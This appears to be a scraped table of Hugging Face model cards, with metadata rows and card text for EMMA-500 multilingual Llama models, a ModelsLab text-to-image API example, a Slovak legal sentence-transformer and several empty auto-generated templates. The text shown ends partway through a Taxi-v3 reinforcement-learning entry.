library_name: transformers
pipeline_tag: text-generation
---
# Massively Multilingual Adaptation of Large Language Models Using Bilingual Translation Data
## Model Description
**EMMA-500 Llama 3.1 8B** is a state-of-the-art multilingual language model designed to improve language representation, especially in low-resource languages, through continual pre-training on the **Llama 3.1 8B** architecture. Leveraging the **[MaLA Corpus](https://huggingface.co/collections/MaLA-LM/mala-corpus-66e05127641a51de34d39529)**, which spans over 500 languages and is augmented with books, code, instruction data, and papers, EMMA-500 excels in multilingual tasks like commonsense reasoning, machine translation, and text classification.
- Project Website: https://mala-lm.github.io/emma-500-gen2.html
- Paper: https://arxiv.org/abs/2506.00469
---
### Model Details
- **Architecture**: Built on Llama 3.1 8B with enhanced language adaptation through continual pre-training.
- **Languages**: Supports **546 languages** with substantial training data (over 100k tokens each).
- **Data Mix**: A diverse [bilingual mix](https://mala-lm.github.io/static/images/mix-bilingual.png) of text from domains like code, books, instruction data, and papers.
- **Total Tokens**: 671B
**EMMA-500 series**
- 🤗[MaLA-LM/emma-500-llama2-7b](https://huggingface.co/MaLA-LM/emma-500-llama2-7b): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3-8b-mono](https://huggingface.co/MaLA-LM/emma-500-llama3-8b-mono): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3-8b-bi](https://huggingface.co/MaLA-LM/emma-500-llama3-8b-bi): CPT model trained on monolingual data mix in 500+ languages + bilingual translation data in 2,500+ language pairs
- 🤗[MaLA-LM/emma-500-llama3.1-8b-mono](https://huggingface.co/MaLA-LM/emma-500-llama3.1-8b-mono): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3.1-8b-bi](https://huggingface.co/MaLA-LM/emma-500-llama3.1-8b-bi): CPT model trained on monolingual data mix in 500+ languages + bilingual translation data in 2,500+ language pairs
---
### Data Access
🤗[MaLA Corpus Dataset Collection](https://huggingface.co/collections/MaLA-LM/mala-corpus-66e05127641a51de34d39529)
- MaLA monolingual corpus: 🤗[MaLA-LM/mala-monolingual-split](https://huggingface.co/datasets/MaLA-LM/mala-monolingual-split)
- MaLA bilingual translation corpus: 🤗[MaLA-LM/mala-bilingual-translation-corpus](https://huggingface.co/datasets/MaLA-LM/mala-bilingual-translation-corpus)
- MaLA code and reasoning corpus: 🤗[MaLA-LM/mala-code-reasoning-v2](https://huggingface.co/datasets/MaLA-LM/mala-code-reasoning-v2)
---
### Usage
You can use **EMMA-500** for multilingual text generation. Below is an example to generate text using the model:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
model_name = "MaLA-LM/emma-500-llama3.1-8b-bi"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)
input_text = "Once upon a time"
inputs = tokenizer(input_text, return_tensors="pt")
outputs = model.generate(**inputs)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
---
## Use Cases
- Massively multilingual NLP tasks, e.g., machine translation
- Performance regression on some tasks and high-resource languages
- Cannot be used for real-world scenarios, esp. in high-stakes domains.
---
## Citation
If you find this model useful, please cite the paper below.
```
@article{ji2025emma2,
title={Massively Multilingual Adaptation of Large Language Models Using Bilingual Translation Data},
author={Shaoxiong Ji and Zihao Li and Jaakko Paavola and Indraneil Paul and Hengyu Luo and Jörg Tiedemann},
year={2025},
journal={arXiv preprint 2506.00469},
url={https://arxiv.org/abs/2506.00469},
}
```
Check out the below [paper](https://arxiv.org/abs/2409.17892) for the precedent EMMA-500 model trained on Llama 2 (🤗[MaLA-LM/emma-500-llama2-7b](https://huggingface.co/MaLA-LM/emma-500-llama2-7b)).
```
@article{ji2024emma500enhancingmassivelymultilingual,
title={{EMMA}-500: Enhancing Massively Multilingual Adaptation of Large Language Models},
author={Shaoxiong Ji and Zihao Li and Indraneil Paul and Jaakko Paavola and Peiqin Lin and Pinzhen Chen and Dayyán O'Brien and Hengyu Luo and Hinrich Schütze and Jörg Tiedemann and Barry Haddow},
year={2024},
journal={arXiv preprint 2409.17892},
url={https://arxiv.org/abs/2409.17892},
}
```
|
MaLA-LM/emma-500-llama3-8b-bi | MaLA-LM | 2025-06-09T08:21:46Z | 36 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"dataset:MaLA-LM/mala-monolingual-split",
"dataset:MaLA-LM/mala-code-reasoning-v2",
"dataset:MaLA-LM/mala-bilingual-translation-corpus",
"arxiv:2506.00469",
"arxiv:2409.17892",
"license:llama3",
"autotrain_compatible",
"text-generation... | text-generation | 2025-05-10T07:40:47Z |
---
license: llama3
datasets:
- MaLA-LM/mala-monolingual-split
- MaLA-LM/mala-code-reasoning-v2
- MaLA-LM/mala-bilingual-translation-corpus
base_model:
- meta-llama/Llama-3-8B
library_name: transformers
pipeline_tag: text-generation
---
# Massively Multilingual Adaptation of Large Language Models Using Bilingual Translation Data
## Model Description
**EMMA-500 Llama 3 8B** is a state-of-the-art multilingual language model designed to improve language representation, especially in low-resource languages, through continual pre-training on the **Llama 3 8B** architecture. Leveraging the **[MaLA Corpus](https://huggingface.co/collections/MaLA-LM/mala-corpus-66e05127641a51de34d39529)**, which spans over 500 languages and is augmented with books, code, instruction data, and papers, EMMA-500 excels in multilingual tasks like commonsense reasoning, machine translation, and text classification.
- Project Website: https://mala-lm.github.io/emma-500-gen2.html
- Paper: https://arxiv.org/abs/2506.00469
---
### Model Details
- **Architecture**: Built on Llama 3 8B with enhanced language adaptation through continual pre-training.
- **Languages**: Supports **546 languages** with substantial training data (over 100k tokens each).
- **Data Mix**: A diverse [bilingual mix](https://mala-lm.github.io/static/images/mix-bilingual.png) of text from domains like code, books, instruction data, and papers.
- **Total Tokens**: 671B
**EMMA-500 series**
- 🤗[MaLA-LM/emma-500-llama2-7b](https://huggingface.co/MaLA-LM/emma-500-llama2-7b): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3-8b-mono](https://huggingface.co/MaLA-LM/emma-500-llama3-8b-mono): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3-8b-bi](https://huggingface.co/MaLA-LM/emma-500-llama3-8b-bi): CPT model trained on monolingual data mix in 500+ languages + bilingual translation data in 2,500+ language pairs
- 🤗[MaLA-LM/emma-500-llama3.1-8b-mono](https://huggingface.co/MaLA-LM/emma-500-llama3.1-8b-mono): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3.1-8b-bi](https://huggingface.co/MaLA-LM/emma-500-llama3.1-8b-bi): CPT model trained on monolingual data mix in 500+ languages + bilingual translation data in 2,500+ language pairs
---
### Data Access
🤗[MaLA Corpus Dataset Collection](https://huggingface.co/collections/MaLA-LM/mala-corpus-66e05127641a51de34d39529)
- MaLA monolingual corpus: 🤗[MaLA-LM/mala-monolingual-split](https://huggingface.co/datasets/MaLA-LM/mala-monolingual-split)
- MaLA bilingual translation corpus: 🤗[MaLA-LM/mala-bilingual-translation-corpus](https://huggingface.co/datasets/MaLA-LM/mala-bilingual-translation-corpus)
- MaLA code and reasoning corpus: 🤗[MaLA-LM/mala-code-reasoning-v2](https://huggingface.co/datasets/MaLA-LM/mala-code-reasoning-v2)
---
### Usage
You can use **EMMA-500** for multilingual text generation. Below is an example to generate text using the model:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
model_name = "MaLA-LM/emma-500-llama3-8b-bi"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)
input_text = "Once upon a time"
inputs = tokenizer(input_text, return_tensors="pt")
outputs = model.generate(**inputs)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
---
## Use Cases
- Massively multilingual NLP tasks, e.g., machine translation
- Performance regression on some tasks and high-resource languages
- Cannot be used for real-world scenarios, esp. in high-stakes domains.
---
## Citation
If you find this model useful, please cite the paper below.
```
@article{ji2025emma2,
title={Massively Multilingual Adaptation of Large Language Models Using Bilingual Translation Data},
author={Shaoxiong Ji and Zihao Li and Jaakko Paavola and Indraneil Paul and Hengyu Luo and Jörg Tiedemann},
year={2025},
journal={arXiv preprint 2506.00469},
url={https://arxiv.org/abs/2506.00469},
}
```
Check out the below [paper](https://arxiv.org/abs/2409.17892) for the precedent EMMA-500 model trained on Llama 2 (🤗[MaLA-LM/emma-500-llama2-7b](https://huggingface.co/MaLA-LM/emma-500-llama2-7b)).
```
@article{ji2024emma500enhancingmassivelymultilingual,
title={{EMMA}-500: Enhancing Massively Multilingual Adaptation of Large Language Models},
author={Shaoxiong Ji and Zihao Li and Indraneil Paul and Jaakko Paavola and Peiqin Lin and Pinzhen Chen and Dayyán O'Brien and Hengyu Luo and Hinrich Schütze and Jörg Tiedemann and Barry Haddow},
year={2024},
journal={arXiv preprint 2409.17892},
url={https://arxiv.org/abs/2409.17892},
}
```
|
stablediffusionapi/lumixgen-cyberrealistic-pony-11.0 | stablediffusionapi | 2025-06-09T08:14:16Z | 0 | 0 | diffusers | [
"diffusers",
"modelslab.com",
"stable-diffusion-api",
"text-to-image",
"ultra-realistic",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionXLPipeline",
"region:us"
] | text-to-image | 2025-06-09T08:12:40Z | ---
license: creativeml-openrail-m
tags:
- modelslab.com
- stable-diffusion-api
- text-to-image
- ultra-realistic
pinned: true
pipeline_tag: text-to-image
library_name: diffusers
widget:
- text: a girl wandering through the forest
output:
url: https://image.civitai.com/xG1nkqKTMzGDvpLrqFT7WA/cbece6a6-4ba3-4011-9245-dbdd5f83b117/original=true,quality=90/00033-1584643324.jpeg
---
# None API Inference
<Gallery />
## Get API Key
Get API key from [ModelsLab API](http://modelslab.com), No Payment needed.
Replace Key in below code, change **model_id** to "lumixgen-cyberrealistic-pony-11.0"
Coding in PHP/Node/Java etc? Have a look at docs for more code examples: [View docs](https://docs.modelslab.com)
Try model for free: [Generate Images](https://modelslab.com/models/lumixgen-cyberrealistic-pony-11.0)
Model link: [View model](https://modelslab.com/models/lumixgen-cyberrealistic-pony-11.0)
View all models: [View Models](https://modelslab.com/models)
```python
import requests
import json
url = "https://modelslab.com/api/v6/images/text2img"
payload = json.dumps({
"key": "your_api_key",
"model_id": "lumixgen-cyberrealistic-pony-11.0",
"prompt": "ultra realistic close up portrait ((beautiful pale cyberpunk female with heavy black eyeliner)), blue eyes, shaved side haircut, hyper detail, cinematic lighting, magic neon, dark red city, Canon EOS R3, nikon, f/1.4, ISO 200, 1/160s, 8K, RAW, unedited, symmetrical balance, in-frame, 8K",
"negative_prompt": "painting, extra fingers, mutated hands, poorly drawn hands, poorly drawn face, deformed, ugly, blurry, bad anatomy, bad proportions, extra limbs, cloned face, skinny, glitchy, double torso, extra arms, extra hands, mangled fingers, missing lips, ugly face, distorted face, extra legs, anime",
"width": "512",
"height": "512",
"samples": "1",
"num_inference_steps": "30",
"safety_checker": "no",
"enhance_prompt": "yes",
"seed": None,
"guidance_scale": 7.5,
"multi_lingual": "no",
"panorama": "no",
"self_attention": "no",
"upscale": "no",
"embeddings": "",
"lora": "",
"webhook": None,
"track_id": None
})
headers = {
'Content-Type': 'application/json'
}
response = requests.request("POST", url, headers=headers, data=payload)
print(response.text)
```
> Use this coupon code to get 25% off **DMGG0RBN** |
szoplakz/slovak-legal-sbert | szoplakz | 2025-06-09T08:05:13Z | 0 | 0 | sentence-transformers | [
"sentence-transformers",
"sentence-similarity",
"feature-extraction",
"generated_from_trainer",
"dataset_size:500000",
"loss:CosineSimilarityLoss",
"base_model:kinit/slovakbert-sts-stsb",
"base_model:finetune:kinit/slovakbert-sts-stsb",
"autotrain_compatible",
"endpoints_compatible",
"region:us"... | sentence-similarity | 2025-06-09T06:12:43Z | ---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- generated_from_trainer
- dataset_size:500000
- loss:CosineSimilarityLoss
base_model: kinit/slovakbert-sts-stsb
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on kinit/slovakbert-sts-stsb
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [kinit/slovakbert-sts-stsb](https://huggingface.co/kinit/slovakbert-sts-stsb). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [kinit/slovakbert-sts-stsb](https://huggingface.co/kinit/slovakbert-sts-stsb) <!-- at revision 770633080dda1d1867e7179a456ed53138280c08 -->
- **Maximum Sequence Length:** 256 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
<!-- - **Training Dataset:** Unknown -->
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
|
georgeiac00/sentiment-dpo-lora_4_bit_full_data_with_meta | georgeiac00 | 2025-06-09T08:00:09Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T08:00:00Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Satram/Llama_Instruct_Articulo | Satram | 2025-06-09T07:57:30Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T07:57:21Z | ---
base_model: unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Satram
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
ufouser/deneme6 | ufouser | 2025-06-09T07:56:27Z | 1 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"llama-factory",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T07:52:14Z | ---
library_name: transformers
tags:
- llama-factory
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
GabrielMM/Instruct_DPO_v2_6ksteps | GabrielMM | 2025-06-09T07:55:53Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T07:55:15Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Ali-Mhrez/arbertv2-finetuned-segment3-arastance-stance-detection | Ali-Mhrez | 2025-06-09T07:41:02Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2025-06-09T07:40:50Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
archishin/q_Taxi-v3-v1 | archishin | 2025-06-09T07:37:02Z | 0 | 0 | null | [
"Taxi-v3",
"q-learning",
"reinforcement-learning",
"custom-implementation",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T07:12:22Z | ---
tags:
